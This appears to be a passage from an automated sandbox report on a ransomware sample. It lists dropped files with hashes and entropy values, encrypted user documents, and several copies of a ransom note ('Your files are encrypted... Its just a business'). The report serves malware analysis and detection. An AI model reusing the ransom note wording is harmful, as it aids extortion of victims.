          SHA1:39902CDB63B54EB6BE0D6558622A161B6E4493D0
          SHA-256:34C18D66BA2FB4DECA32C14E28EB115C7921B0B1D51790C5E45140A667C0DD15
          SHA-512:546B0B50AD6B2940BBDE0A67613B5F9B55A0FF45D79F4D53E81280A74CF37D30884C01367C7B725672B73FCE3D702E86A967363709D2502ECC1A39F492610649
          Malicious:false
          Preview: ..*..D.|mo.J6.5Y.....5..8...E.|....=..g..["..a......P..Z........2)..h....P?':..l}x.m. .2.5h..B......N.....M..K.Lg..$...x.L.a......J.........zp..`n-...A..I........[y#.D.6H,ol*.|..D...JmV+....[.a..=[.......#.!yU.u+...1........zg4...R.lH...[..t.....(..H.T.Q......R....J..G\..\.T.N{..2..i..t...w..6Fh;K........q...%.{,We.../@VC...tA...$.~0.....T..T.-4+...Uf....kl.8]...9......O.!..<..A.3.$...yuX...L%R#.U.QX9....-..f.7IC.]5.-.I.V$.(2..\....7.&*3.#.......#J...vo.t.6.4X..\.7..b....4.0m..2.-...eR.}.../..).].8....|.]6.....d..@...b"3....M:.....j...~...Sj..F.hI.o.D.......Gb..v...v.<1E{....k>../.u."...]1$}@..'I....:j....m..Ku..........z0/1.........zY..T....\a..N.8X/.=1...x..<.^....x.6H.S.....JG..T.k.........p..*[.....%^.oE.F9.....^.we..LP.Me....YE...T.......A,Ah....G.>.....V.1.....7I...'..V.D..........%........{.....!5.@.D.Mmx.8..f.j..#7..>=...-sNIsHT...eEc9l...ZPZ......l.....?Y....B......@.7.AO....q.Z.......4..U..*....a.N.)...@.>:.....,\T.....
          C:\Users\user\Desktop\ZTGJILHXQB\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844143453843308
          Encrypted:false
          SSDEEP:24:5pthdeDmVmDl87cedyXNoBQnkATxFcgRwrqRS7HXADn+zpQ2:3thcqel87c4goBYTxheqRS73u+Vl
          MD5:ABA9749CF91053EA978CBB5B839782FD
          SHA1:88C4553C716C39E58B3927862DA811CBC1F84C20
          SHA-256:92E1C5DD49E9DC24917B4F41A8E65208DFC0F5E09420FF6800EDDFB116B99562
          SHA-512:A0200096C66C192C5EA2CEDA4D20CF5E109F17A61F99E884978D6D452FA481BE82BC1CA23319A023908589C3AFC6AB82118E4B943F264F99BF28E422F0CBF3E2
          Malicious:false
          Preview: ..0...D...I.d..p).....kW.S.82.........b..S\......g.P.O.. ...QzO....1...r.0.....[H.^....P.~..H...7P..c.....7..........q..4U...(.`...H\.Q.!..v9.Y.*.2P..p.s.....V@.b,<!..#o.....[.Z.p..8............-...d..> ..G..a..".....g.u j'...pB...k....F..~7.BK...s.m.u..;.".........E....cs....v;=....=|v<.h..g$5..R+..n......Uj.[7..5b.^.D.S....t..4.kv.sE..QC&..^_..5W...'./.P..U..D|.?.*...Bn./z]P...v...#...f5<..Mj..w.t..I.."...n..,ZK...............q.ms9.W'....v-"L..f|...Ch....66.*=....l.E62.i*.Qp\.EN...&...A.."b...Oev.D..y...L..z../z...A.....:.>.y./\.XX*..8.5...}h<Pk|...0Q..7..K.2.V.{.....9...S..%U.`..=...N.7.'.}"...m.?..Y *.-.d.Nf...`.d..y..UBZB<zh.`..,..?..(....VJ.RP%.L~..P..#\.#..U7.X.x7N0..GE."..Eg....|..D..&.UI..y....a.%^..Se!..*.x....s.$}b5"...E..Z4...S...j.A..C..N5..dU6../a....P.o....!..k..~.<.A..O.......%.]d...a~f.XL.,C./.....'..1..-.[A..I.0.F[.&8Fh#.$..*........T.`..#.`..j.../)Nj...n.f.....2T..s...x...p...h.K^..J...!o.....S_.+....O.D.VECO..5l..^..K..v.....
          C:\Users\user\Documents\EEGWXUHVUG\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\EOWRVPQCCS\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.889439367840137
          Encrypted:false
          SSDEEP:24:qigrdEJN52hYmhGRuINSvq6KaalQJXe20NqL0+z3p2OiiVtFLTtrEUXADn+zmUbe:qVJEJNMhgSC6Kal2qL0cxptV5Lu+He
          MD5:D4F1CC337B40AC8EF194D08979547677
          SHA1:F8C89ED5BE2EB73B23CB4D6F07429933E9209840
          SHA-256:4A2849D40C0B441BFA149F81FBCFBDFA0ADA675F13FFD20B0AB8BD39C6B064D9
          SHA-512:5A23CB6211519C480FF4496437A87CDEC67FCD2F6232CF17E70139E8DA2F99C90B1CDC7517CA9DD259FE2EFADB1CEB8FB513DE54A335A41CB1F52D56A1F0F436
          Malicious:false
          Preview: .|.....(...w.+0Pk..8z.+.....m[.%....2..i...o....0^......E..4..\E .@....px..z....V.<b..P=...5sIU.....DRR.q.@%.9.AW...'DC..gv`...W.....8,i.p.<V.Tut..#..5.V`..]}..f.... ..r`.C[m9.>.6.........?....l.WO.#..a....R.L..L.f.m..;...64.f.G..\2..=..a.....np...t...g29.1.l..'N.{+)..nN'-.........}ebb.7..9v.q'..>.^Qu...R_8eL..).........A.*ku..qC>...-\ja%...7.T..SC..f..o.Y.F;r.<...DE.b.9g.r..^.3......f...I. ..9.{....a.....G............y.$...Sa.`..?d..g.....B.l.D....t..7....G.@I.&.Q.L.....>.>.x.n.8.j.x.......-.',.GA...ug....m@....].z...v%.v...|C.m.!..B....`V2gy[g.J..".Z.b..J.To....9.hH.G..wJ...:...f..<.`... ./iJ8..o......e.M.....?.}B<....Lw.vH$.p.....U?..Kv+%k,...,qw3F.d7.t>..OeR~.Az......x....+d7....F.....y.D1..sK.U.....-.."....KO=3z'E8&X...a...3.......<.~...~>...s....c|N...SU.]\..d.t.d...OT....E.p|g...)..W.%._f..K.../.h.J..VJi.fK.T......;uWw..G.!h.R.O.....c...t1.......?..{Q.In...}\...@.:q9..k.k.n.!y_....q.x.6u!..M.k...O1Qp..jc......l......~<.B.sr....Rp0"Y
          C:\Users\user\Documents\FENIVHOIKN\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.84752327604628
          Encrypted:false
          SSDEEP:24:ifOaPxA/PFG3HPsE6XtcUq11/igdPdF+aZoeCupJkT9uAzpkQhqKhwXADn+zVFVY:am/w3vRytctDpZo7cWYikiIu+jVY
          MD5:8A7645898367089DFF84E803AA235D08
          SHA1:5FAF7F2D26780B440E3685CE44F4EF3F300E62AE
          SHA-256:379B1F2584E6263F86AE4E3E3D18E2AFCD21ACCA23759B37878760C0D42880C6
          SHA-512:643021B2955606FC183BD395C7661CAF8C6E7CB3DF2FE43486AE4C93ED7DC06A7A0FB53BA070FDB1234F9CFECDDC4B51FFA6ACBDD2255FC2E9E6CADFE0D5BC58
          Malicious:false
          Preview: .>g.........A@.{.Y...A.b%my.~..r.[.D.....6K.)*+gH.w=.../_.h)........."2/.H..6]5...j...*M...Q.[]..52.`..n..I....]..)c.2...........Xu..V.D..].r.qZ..]o..T...#.l.e.....`...,GS~N..~.L9..+...2+.\zwA...../...h.......F.A...xA.D..%u..DD.5w^t.........x.....My.....Hj...`.....^...6E8..V....l>..Z.x>...a..T0.]....r....]%....X.`2.*hBKy|...G:V.7..b..p.....ST.6.^..d...z%m.R,4..,....Xb..u.].......,? .R.....k{..C...Z..$.....}4.*1^t....Hw..=. ...Cx.....z...'.....|9.c..R..V<.WD.O....R..R.[|...?..,..<2=....]R...s..^-.c.'K1..4........6[..z.}D).<(.r@...!...M..z.[....M.1....vto.].p...GK@.w_...I..q1.....l....q...HA.[~...e5...r.&.?.|4...|lig.Ir.87X....sx.&.......;.c'...R[G.p..T.N....x......2=...]....9....]J.*g!....u.m....<....B0m.1.tl.i...b4...E......Z.$..@)....6........k..N....?.:.o.1u.....t!K..P./..2..DR.\......2...;.41.]Z.WA.p{.w..Q..I=..|Ou..#..^..*q[i.$"..(.......KK.k....~=zj.j._..\....(.F..n.ikh...._.P.Ry........R.NxHz.?......c.+x.f...... .......C_.....-..-.
          C:\Users\user\Documents\FENIVHOIKN\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862212854272136
          Encrypted:false
          SSDEEP:24:DbH8LcfygL54m9IEKa+Vy4B/jS+bXe6JV9vH21m3Yah1pXADn+zJOe:DIHkLIVa+Vy4B/g6r99rhDu+1X
          MD5:7892913D011AB300283BA51D9725D9B1
          SHA1:488DF744858D4E7038FAE08907B81E16C58D7902
          SHA-256:C98C65F49DE250837EA7BA6A29C91B8DF933BBDA9D909309A11377D1385ACB71
          SHA-512:0C07456C9C454B29D17BB072CE83BF5C56291C6E8957782ECE65606F9786461837C11A5C8960DD10988A348F7C4FE9B06A15664721C46AC560DCEC008B5A1A2B
          Malicious:false
          Preview: m.P...".i..6G.V.[...@...... <=Hv.B....O.&eE$.kh.4...b.YX......k..z....x...q......Y....r.4H..X/..{...(.u.s..If..\...... {?.../#...h....4.:...L...9.,..H..-BM.@..E..N.Z.....yw.M1.....3....M..e.$....e6......'[.....T...Z\.......H0X.8....7..._1.y..6...(..AE....M......>,....eTWv...jj...J~:.)..s.qv#.l...WB...../......]..j.Z0...Kt8r....`.9*.E....5H..?.K...8.?....e...q...w.,.....^......C....P..*y..r^...Y.....?(..L.rf.n....5(O.Z....6.L..u.;.c...'......c3...2..=.i)&..b.Z.r.|...R\.-...?..ah...J......"......#...Q...=.0Up...X......*.A...}R...~.ib.t./...p....j.n{...9>.Jm.;1.@.\..h.....>*9vd.!...L...>..B.8Ml.R.r.~I@[.M.../.S..o.e..).4....x,(..O..J.Fo#..&..c.#......#...1Wm3.=.&..v.=..[)....Op;...'...........7..&..l.%..u..z...^B.=.@........8m.<.*..>...+.f...1...W....{.#,:.1.......j.p..$.I.....yN...uZ..QR....P..~....+...G"G.......Ix....m0..#.n.5.^.]Q/.c.e+w..*...$1..y...-...jr..W[.Z9r[.B.....U....KL..z.e.....ha. ....:n.....f5.0..9.S..9.o.n.*..n...B#.....N..2.g.
          C:\Users\user\Documents\FENIVHOIKN\SQRKHNBNYN.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844142609478651
          Encrypted:false
          SSDEEP:24:bdSAt2qeavZhWAUJZw58W7gyxXpSWnW9aLGzXQM1cuIhzN4tvn8XADn+zzpYI:b1CJZwiYpSyWBXQM1Z1nsu+vSI
          MD5:1A291C914DF600705BFD0856F6DBADF0
          SHA1:3EDB8A7758F60FBD1E53F9EBA8A45CFDDEEA71AB
          SHA-256:A7548BFA1E0C04AE6A421D4C1B4510869F33EA1AC7DAE9D9985F38F66E3466E2
          SHA-512:CFFF6CDE23FDC6A9231A8B1FE3F2802D39E3C96FB928020AE989BF59A3079CD78C47509A651F284F023229BD2A0C6E4FCBC952110E6B5BF56D9CE42447A701AE
          Malicious:false
          Preview: .}.d......J.s.f.....y..F.....p.!454....+.qR6.0....dC5.1.h...']...dV...LEK~...?..{LS...>.(..X..8.....Tm..$.....7.k...@.=r.o.....7.n\....$2..0~'U..!..Sq@t..77....\......Gj....4?...n..q..Z...v..[-.z.N{..lYB...1.Ed4.rm/$.VW|.$>O!..n.....Ak.H.o.).H.....Z.....m.~.\..+3..DxB....1.}.......I...'Oe}.f....N,R...t.B-...............f...v.....h..0.v........m.Yl..^..ZZ..!3......Z.7.5.a{ .g/.v.;...+.......+.5..Pm.s........qHD'.....y..&...p..7,..<6.X...z...(Wm.b.....4.. ..a1...r..p.....&..u..77S`g9....X....7...]..Ct..On....L..M.g....\C.9.nZ/..:.&..:.I#1.*D|'....7...b....I.H.H..e._.L.....Ju.T..=...E.Xk..,e..f_:.7.._.P$.s...........W......".......@H.....<Z...._.k.8..}..t.....}1oAA...o.... ..^........Rn7.'9..~..W...3.@k.%J..VR..6...sR.?.....{.B..ja#d..d-...=v...a.S....o..!.-.Cb.l..SXC.8..\U.qz....x6...IH.>..^...+.P.4.J....I..r.0...3T`.......jZ....U...O../...7...?..........K.s.UF.O"....I..7.J...8UU...:V...d.......2..V......c..2...R....<V...}.m..\.....C?.N.6..K...h.K.+..
          C:\Users\user\Documents\FENIVHOIKN\VAMYDFPUND.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.842064287025823
          Encrypted:false
          SSDEEP:24:nf+1v/5TUBgayfy0A2Yv/6lUKvO1IyUkHr9GjdXcPFrlsQ9rXADn+zxA9Ab:Gx/5TUBg/f4v/6l2IyUK9GjsFZsAu+Vd
          MD5:AF9E181F29AF3C74302FD7A946C7640A
          SHA1:B98CCEB7FD75F8E64660DCE30BFEDD09661DDFBA
          SHA-256:A46C01E8B2838B27FA7B27B4C8EE4BD286B7A42307245F96D1743B7366FB4D65
          SHA-512:02AEF2B6E1281D9E72BF99E3740A24952F3D7D9DCFE6D57A694923E6908147355AF90C90B259AF54478053F8918925C04D8A3D601CC7E330A1EC1D03DC961C77
          Malicious:false
          Preview: ....#.y.b#..,."s1........C.o.,........p...$UJ.1)n....H....q..).)..*....1u.....A.v.-.cj.@jJ.).wl.ye)(.6}.z......%2.....{....h.."~N.............7.7.iS.....IH..+s.....!.M"w...d.AX#`.+y...}.H.I..!...=..+..L.eO.^.4.Lpqx..J%..8..[T6...%z..:(.$....f~.|.;s3.p..y..m.....W......(...!.+Y.....%....b.,..S..@q.Z.7O....2l.Nj..l.N(W...sEH./.{..).l..c.....w*....G_...n...'.7..i.'.}..`...........p.n(.Nj....U..IhR.J.....k..<.G.%dS.......ou]....F..`._^..\...<7(......p....E...cN.....\.oc......8}(......[.N8../......7..I.._.2.hf#.....v..^i..H.>.....).f.A..p.....z....].*..#.@.8.z.i.H..............&H...g..ABn....o(.S,..zN....t.e.]=l.......T..K.........?1...^7.-.DY.B.c.`...p.@C..lg.z.Si.A...2.v..! ... .Q...-...u.{...y8....g+>.....o.}....U......i8 z5P..b.sO .....f..{...j..+C.>.%.v...Yk.;..{.....g._,.v8R.."..h..+HL...h.b...$.#...+.4mNb...Abr.P..4b.. .T..v.&........e.'.Z.V<.7.TZ....U..6=Y......ZRy....E`.q(.s.E...j.l.....7&*..zB....Ok5~.&.L..!2.~...7.D..%!.=...x^..6O
          C:\Users\user\Documents\FENIVHOIKN\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862238488174111
          Encrypted:false
          SSDEEP:24:6mTPEptWlEaxBaaHdrMzhvsKuTZ8y258LSX1uRihdj1K9Stym17X5AfXADn+zyU:9TPOAaaOCTe15KS0RudjkafGfu+WU
          MD5:2AB6F3AE6CFA980830EF8D4BC89AF5DC
          SHA1:471A9780E00B5F96FA961EC3649C775704A6D89E
          SHA-256:E6E661D8A2C789764AC4A85F319CBE0D38773F30FCD96C780370CD91452D111E
          SHA-512:10EDB515A6FB0EEAF0CA2192915D3C4DB486501E5306BCA5489AF6448D9281906B080DCF8D974B5233DBE787A8CB4D6039679F3F71851063EBDBB42D8C9B1404
          Malicious:false
          Preview: .R...".'H.m..&..|5.}~..X...%..X.z...&92Z.._...B....t...c.......#9{.#.........$.W.i-.....l.....sP....!..-.7.....pv.^\.c./.c.....}Z.9e..4.u..Ct..^.....O...#BP...%-...l0.j.]...Q...{jq..n.3..>..;.....%....*.5....o.t..%X...b..1n...........P{.7..d.1.4.B.[.u...\?.+.5s.C.KbT...^.....x-...g...>..Z".Y..4].S+R.q)....ph.~.=>(9...(......]......L...t..K..B.8...<`..U.........a..&y;...9......|.....J..J.....R..S......;..=.{|.....C....u............4.o..F.>...]..e..]".-.....!.k....Vr.....C'.T...X.\=...1.2..._...j.K.x.:Z...mS3GYil....~zfa...;8N.tGL..5.J.*...X.1....!.h....@m......Gn.\.0..G.K.....yC...^...H.hW..*B...*.._o!..W.....UR..W4....'x..H......P.....F2w}.|...q...N.T.b...M.....4A3....}.y..w.k...7B<%}wHm..s.u."P;.....#.32.6.8.......z_}....v..f+uB:......~...b`7.T!.._...N.o........?..b....6....R.fT5......#......CHr.{*.........%...Q.J."....|.V...P4w^G.Z.B:.4..&.JWwc..>?..U...?.._G?...../..;R.2.T.q):c..o..j..!.UN..j 7...c.>..?0.I..0.M.......po.|#N...s......
          C:\Users\user\Documents\FENIVHOIKN\ZTGJILHXQB.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.84814013749099
          Encrypted:false
          SSDEEP:24:MDPLPJjMNdwrRIhtHZL5lc3HaqZfpadWIy27OHAcKXADn+zBNi5:MTLxANGrRIht5zC6UadWIy2igcWu+dNS
          MD5:DD9FEB2F8AE76C1A90362235C24018BA
          SHA1:222CE42C9BDFE702167C6752ED5D9F08C6A9C0DC
          SHA-256:D774A313BF60ADFCA447920981B199C277194CF1CF502205DC8FC10DECDF1431
          SHA-512:4F9DA415BC51AF8E778F8F325793281FE4415BE29CB663E321FBBD86A6AD4043752D7BBF94718F5F8A0AC4603B642DEDAF330CBD9814B5B6429ACB9005AB8598
          Malicious:false
          Preview: ..BMUo....Y...^.N:.ni.w...x8.u....=%....d..s....p.c...7._p..1W.+x...4.;....{...g..i.W..X.+{..:.c.......7/...t+}].`.h..i...3.-....^5}!.%.8...N.....*q..E.-..H^x<E..D...Wr........v...".i...{..p..q.*L.......WsE;...x.a....!.?.q...h..|...\].6..$;..MM.4..<#..`....Ng.Y.-EE...=.8...I..[...(.8.!/Y"...`B..E9.X.]}x.."...|....|.n.#.rT.^.$.XB..CCj...`z...Jpg..9~.;.........~..e....B......%.....2.)v.D.k..Y......O=.QI..@.[5.Bf!..B.....V..o=(..0.)]`Es=`...G3..59.f...q4{...p.0.n.!..5.*...%x;.z..\..{......A...[wE..8pI5...Ev......F9.k........YV.._...uy....)............eO...s.....V0..j........YX......x.2.x~-a|C.E.'w..".O..e.,k7.....yB^e.{R.o.#....K.h:.......c.Y...x..ll....j8.jq..J.m.....\..v,.(.....~~..JY(a..$S...7)..........>..O..D.R......X^.Wi.E..<o......$... ...f...:..cRY..P..y.wJ.....Ze.@.z...+wnu......*f.,H*.H?..?z9$.K%.:J..(;UK.qx5y...$...?i..z.Q....p....QW...)...P...s..X.-j.........\...4.g....~~m.....".i>..7.2....B....yk)69....{..(=.J_.A..[..eWY9..F.
          C:\Users\user\Documents\FENIVHOIKN\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
